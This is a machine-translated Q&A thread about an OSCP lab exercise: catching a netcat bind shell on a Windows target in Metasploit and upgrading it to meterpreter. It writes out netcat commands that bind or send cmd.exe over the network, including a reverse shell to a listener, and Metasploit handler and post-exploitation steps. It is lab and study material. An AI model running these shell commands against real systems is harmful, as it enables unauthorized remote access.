web-dev-qa-db-ja.com

msfを使用してnetcatリスナーとShell_to_meterperterに接続する

私は何時間も努力してきましたが、簡単なことをすることに失敗しました!

私は管理者付きの箱を持っています(OSCPを取得-何も違法ではありません)。私はRDPエクスプロイトを使用し、シェルを取得し、ユーザーを追加し、ユーザーを管理者グループに入れました。座っているときは、現在、管理者と一緒にrdesktopにいます。

与えられた-ターゲット-192.168.1.200、私は管理シェルとrdesktopへのアクセス権を持っています。 nc.exeをアップロードした

KALI-私のマシン-192.168.1.100。

私がやろうとしていることは、TARGETのLISTENINGポートを開くことです... c:\ nc -lvp 9999 -e c:\ windows\system32\cmd.exe

... metasploitフレームワークを使用しているときに、KALIボックスから開いているポートに接続します。 nc 192.168.1.200 9999を使用して接続できますが、その接続をmetasploitセッションにすることはできません。

次に、post/multi/manage/Shell_to_meterpreterを使用して、この接続をmeterpreterセッションに変えます

ありがとう!

3
Dan Miller

わかった!!!

https://www.youtube.com/watch?v=LRS05gvcvdk

TARGETリスナーをポート4444に設定する必要がありました。次にmulti/handlerを実行し、次にwindows/Shell_bind_tcpをペイロードします。

エクスプロイトと私はシェルを取得します。 Ctrl-Zでセッションをバックグラウンドにし、次のコマンドを実行します:post/multi/manage/Shell_to_meterpreterセッションで、bamが実行しました!

2
Dan Miller

schroederは厳密であり、nc -v 192.168.1.100 4040(IPとポートを配置)を使用してクライアントから接続するか、msfconsoleからwindows/Shell/bind_tcp payloadを使用して、セッションをmeterpreterにアップグレードします。 explotationシェルをMeterpreterに送信

2番目のヒントは、nc -nvl 9090 -e cmd.exeだけではサーバーからリバース接続を取得できないと思います(このコマンドは、ポート9090を開き、すべての入力、出力をcmdインスタンスとその「バインドサーバー」にリダイレクトします。 "-l option is to listen、ncでリバースサーバーを生成するには、nc -v 10.10.1.10 4040 -e cmd.exeを実行し、マシンをリスナーとして実行する必要があります)

1
Sarastro